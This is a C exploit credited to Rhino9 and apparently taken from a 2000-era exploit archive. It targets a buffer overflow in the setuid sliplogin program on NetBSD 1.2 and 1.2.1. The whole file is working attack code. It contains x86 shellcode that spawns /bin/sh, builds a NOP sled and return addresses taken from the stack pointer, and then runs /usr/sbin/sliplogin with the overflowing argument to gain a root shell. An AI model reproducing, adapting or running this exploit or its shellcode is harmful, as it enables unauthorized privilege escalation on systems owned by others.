/* 	Coded by: humble of Rhino9
	sliplogin buffer overflow for netbsd 1.2 1.2.1
*/

#include <stdlib.h>
#include <unistd.h>

char shellcode[] =
  "\xeb\x23"
  "\x5e"
  "\x8d\x1e"
  "\x89\x5e\x0b"
  "\x31\xd2"
  "\x89\x56\x07"
  "\x89\x56\x0f"
  "\x89\x56\x14"
  "\x88\x56\x19"
  "\x31\xc0"
  "\xb0\x3b"
  "\x8d\x4e\x0b"
  "\x89\xca"
  "\x52"
  "\x51"
  "\x53"
  "\x50"
  "\xeb\x18"
  "\xe8\xd8\xff\xff\xff"
  "/bin/sh"
  "\x01\x01\x01\x01"
  "\x02\x02\x02\x02"
  "\x03\x03\x03\x03"
  "\x9a\x04\x04\x04\x04\x07\x04";

unsigned long get_esp(void)
{
  __asm__("movl %esp, %eax");
}

void main(int argc, char **argv)
{
  char *buf,*p;
  unsigned long *adr;

  int i,off;

  if (argc>1)
    off=atoi(argv[1]);
  else off=4;
  printf("using buffer delta:%d\n",off);

  if((p = buf = malloc(2268+28+off))==NULL)
    exit(-1);

  memset(p, 0x90, 2268+off);
  p += 2268+off - strlen(shellcode);

  for(i = 0; i < strlen(shellcode); i++)
    *p++ = shellcode[i];
  adr = (long *)p;
  for(i = 0; i < 7; i++)
    *adr++ = get_esp();
  p = (char *)adr;
  *p = 0;
  execl("/usr/sbin/sliplogin", "sliplogin",buf, NULL);
}
/*                    www.hack.co.za              [2000]*/